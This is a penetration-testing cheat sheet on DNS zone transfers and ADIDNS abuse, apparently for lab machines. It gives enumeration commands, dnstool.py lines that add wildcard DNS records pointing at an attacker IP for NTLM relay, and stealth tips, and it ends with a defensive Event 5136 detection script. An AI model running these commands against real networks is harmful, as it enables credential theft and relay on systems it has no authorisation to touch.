DNS Zone Transfers & ADIDNS Exploitation

#Overview

DNS zone transfers replicate DNS records between servers. If misconfigured, they expose all internal hostnames, subdomains, and network topology. ADIDNS (Active Directory Integrated DNS) can be exploited to add records for NTLM coercion attacks.

#Prerequisites

  • DNS server that allows zone transfers (AXFR)
  • Network access to DNS port 53
  • For ADIDNS: domain user credentials with DNS write permissions

#Detection & Enumeration

```bash
# Attempt DNS zone transfer (AXFR)
dig axfr domain.local @10.10.10.10
dig axfr domain.local @ns1.domain.local

# Using host command
host -t axfr domain.local 10.10.10.10

# Using dnsrecon
dnsrecon -d domain.local -t axfr -n 10.10.10.10

# Using nmap
nmap --script dns-zone-transfer -p 53 10.10.10.10

# Using fierce
fierce --domain domain.local --dns-servers 10.10.10.10
```

#Exploitation / Execution

#ADIDNS Exploitation with Impacket

```bash
# Add a DNS record in ADIDNS (for NTLM coercion)
python3 dnstool.py -u 'DOMAIN\user' -p 'password' -r 'attacker.domain.local' -d 10.10.14.5 --action add dc.domain.local

# Add wildcard record (resolves ALL queries to attacker IP)
python3 dnstool.py -u 'DOMAIN\user' -p 'password' -r '*' -d 10.10.14.5 --action add dc.domain.local

# Remove a DNS record (cleanup)
python3 dnstool.py -u 'DOMAIN\user' -p 'password' -r 'attacker.domain.local' --action remove dc.domain.local
```

#Wildcard Detection Methodology

```bash
# Test for wildcard DNS (important before subdomain brute-forcing)
dig random12345.domain.local A +short
dig thisdoesnotexist99.domain.local A +short
# If both resolve to the same IP → wildcard is active
# Filter wildcard IPs from brute-force results to avoid false positives
```

#NSEC/NSEC3 Zone Walking

```bash
# NSEC walking — enumerate all records via DNSSEC
dig @ns1.domain.local domain.local NSEC
dnsrecon -d domain.local -t zonewalk

# NSEC3 walking (hashed names, harder to walk)
# Use nsec3walker or similar tools
# nsec3walker domain.local
```

#DNS Cache Snooping

```bash
# Recursive query for comparison; a TTL below the zone's configured value
# suggests the record was already in the resolver's cache
dig @10.10.10.10 www.example.com A +dnssec +additional
# Non-recursive query: answered only from cache, so it checks without
# generating a new upstream lookup
dig @10.10.10.10 www.example.com A +noedns +norecurse
```

#Common Pitfalls

  • Zone transfers are blocked by default on modern DNS servers — always try but expect failure
  • ADIDNS record additions require DNS write permissions — standard users may not have this
  • Wildcard DNS creates false positives in subdomain brute-forcing — always test for wildcards first
  • DNS cache snooping may not work if the server doesn't support non-recursive queries
  • NSEC3 is harder to walk than NSEC — hashes must be cracked or brute-forced

#OPSEC Considerations

  • DNS brute-force generates thousands of queries to authoritative name servers — easily detected
  • Using public resolvers (8.8.8.8, 1.1.1.1) for initial queries is stealthier than querying target name servers directly
  • DNS zone transfer attempts are logged by most modern DNS servers
  • ADIDNS modifications are logged in the Directory Service event log (Event ID 5136)
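As an added example that is not part of this module, the triage logic a defender could run over Event 5136 records to surface the ADIDNS record additions described above. The EventData field names follow the 5136 schema; the sample events, user names and zone DN are constructed for the example.

```python
"""Triage Windows Security Event 5136 records for ADIDNS record additions.
Added example, not from the original module. A dnsNode under CN=MicrosoftDNS is a
DNS record, so "Value Added" on its dnsRecord attribute is an ADIDNS write and a
node named "*" is a wildcard. Sample events below are constructed, not real logs."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# dnsNode DN layout: DC=<record name>,DC=<zone>,CN=MicrosoftDNS,<partition ...>
DNS_NODE_RE = re.compile(r"^DC=(?P<name>[^,]+),DC=(?P<zone>[^,]+),CN=MicrosoftDNS,", re.I)
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"
ZONE_DN = "DC=domain.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=local"  # constructed

def parse_event(xml_text):
    """Return the <EventData> Name/value pairs of one event as a dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.iterfind(".//e:Data", NS)}

def classify(ev):
    """Return a finding for an ADIDNS record addition, or None if not one."""
    is_dns_write = (ev.get("ObjectClass", "").lower() == "dnsnode"
                    and ev.get("AttributeLDAPDisplayName", "").lower() == "dnsrecord"
                    and ev.get("OperationType") == VALUE_ADDED)
    m = DNS_NODE_RE.match(ev.get("ObjectDN", ""))
    if not (is_dns_write and m):
        return None
    name = m.group("name")
    return {"zone": m.group("zone"), "record": name, "wildcard": name == "*",
            "by": ev.get("SubjectUserName", "?"),
            "severity": "high" if name == "*" else "medium"}

def _event(**fields):
    """Build a minimal 5136-shaped event XML from constructed field values."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return f'<Event xmlns="{NS["e"]}"><EventData>{data}</EventData></Event>'

# Constructed samples: a normal host record, a wildcard record, a non-DNS change.
SAMPLE_EVENTS = [
    _event(SubjectUserName="jdoe", ObjectClass="dnsNode", OperationType=VALUE_ADDED,
           AttributeLDAPDisplayName="dnsRecord", ObjectDN=f"DC=ws01,{ZONE_DN}"),
    _event(SubjectUserName="jdoe", ObjectClass="dnsNode", OperationType=VALUE_ADDED,
           AttributeLDAPDisplayName="dnsRecord", ObjectDN=f"DC=*,{ZONE_DN}"),
    _event(SubjectUserName="admin", ObjectClass="user", OperationType=VALUE_ADDED,
           AttributeLDAPDisplayName="description", ObjectDN="CN=admin,CN=Users,DC=domain,DC=local"),
]

def findings(xml_events=SAMPLE_EVENTS):
    """Classify each event and return the findings, in log order."""
    return [f for f in (classify(parse_event(x)) for x in xml_events) if f]
```

Auditing of Directory Service Changes must be enabled and a SACL set on the DNS zone objects before 5136 is emitted for them; without that, this logic has nothing to read.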

#Post-Exploitation Value

DNS zone transfers reveal internal hostnames and network topology. ADIDNS exploitation enables NTLM coercion attacks by directing authentication to attacker-controlled hosts. Combined with Responder or ntlmrelayx, this creates credential capture and relay opportunities.

#Tool References

| Tool | Link |
|---|---|
| dig | Built-in (bind-utils/dnsutils) |
| dnsrecon | https://github.com/darkoperator/dnsrecon |
| dnstool.py | https://github.com/fortra/impacket |
| fierce | https://github.com/mschwager/fierce |
| nsec3walker | https://github.com/anonion0/nsec3walker |

#Source Machines

  • Common in HTB machines with DNS services
  • Frequently paired with NTLM relay attacks